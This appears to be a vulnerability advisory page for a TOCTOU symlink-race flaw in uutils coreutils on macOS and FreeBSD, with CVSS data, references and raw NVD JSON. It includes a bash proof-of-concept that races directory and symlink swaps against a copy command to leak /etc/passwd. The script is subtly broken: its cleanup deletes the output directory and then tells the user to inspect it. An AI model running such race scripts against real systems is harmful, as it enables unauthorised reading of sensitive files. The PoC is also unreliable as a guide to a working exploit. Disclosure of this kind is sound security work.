Security Vulnerability Report
CVE-2026-35362 CVSS 3.6 LOW

CVE-2026-35362

Published: 2026-04-22 17:16:39
Last Modified: 2026-04-27 12:26:41

Description

The safe_traversal module in uutils coreutils, which provides protection against Time-of-Check to Time-of-Use (TOCTOU) symlink races using file-descriptor-relative syscalls, is incorrectly limited to Linux targets. On other Unix-like systems such as macOS and FreeBSD, the utility fails to utilize these protections, leaving directory traversal operations vulnerable to symlink race conditions.

CVSS Details

CVSS Score
3.6
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35362: TOCTOU race condition in uutils coreutils on non-Linux systems

TARGET_DIR="safe_dir"
SYMLINK_TARGET="/etc/passwd"   # Target sensitive file
SYMLINK_NAME="link_dir"
DESTINATION="output_dir"

# Setup environment
mkdir -p "$TARGET_DIR"
mkdir -p "$DESTINATION"
ln -s "$SYMLINK_TARGET" "$SYMLINK_NAME"

echo "[+] Starting race condition simulation..."

# Attacker process: Swap directories rapidly to exploit the window
while true; do
    mv "$TARGET_DIR" "tmp_dir"
    mv "$SYMLINK_NAME" "$TARGET_DIR"
    mv "tmp_dir" "$SYMLINK_NAME"
done &
ATTACKER_PID=$!

# Victim process: Run uutils command (e.g., cp) repeatedly
echo "[+] Running vulnerable uutils command..."
for i in {1..100}; do
    # On macOS/FreeBSD, this might follow the symlink to /etc/passwd
    # due to missing safe_traversal protections
    uutils-cp -r "$TARGET_DIR"/* "$DESTINATION" 2>/dev/null &
done

# Cleanup
sleep 2
kill $ATTACKER_PID 2>/dev/null
rm -rf "$TARGET_DIR" "$SYMLINK_NAME" "tmp_dir" "$DESTINATION"
echo "[+] Check $DESTINATION for potential sensitive file leakage."

References

https://github.com/uutils/coreutils/pull/9792 (Issue Tracking, Patch)
https://github.com/uutils/coreutils/releases/tag/0.6.0 (Release Notes)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35362",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-22T17:16:38.960",
    "lastModified": "2026-04-27T12:26:40.533",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The safe_traversal module in uutils coreutils, which provides protection against Time-of-Check to Time-of-Use (TOCTOU) symlink races using file-descriptor-relative syscalls, is incorrectly limited to Linux targets. On other Unix-like systems such as macOS and FreeBSD, the utility fails to utilize these protections, leaving directory traversal operations vulnerable to symlink race conditions."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 3.6,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-367"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*",
                "versionEndExcluding": "0.6.0",
                "matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/uutils/coreutils/pull/9792",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/uutils/coreutils/releases/tag/0.6.0",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      }
    ]
  }
}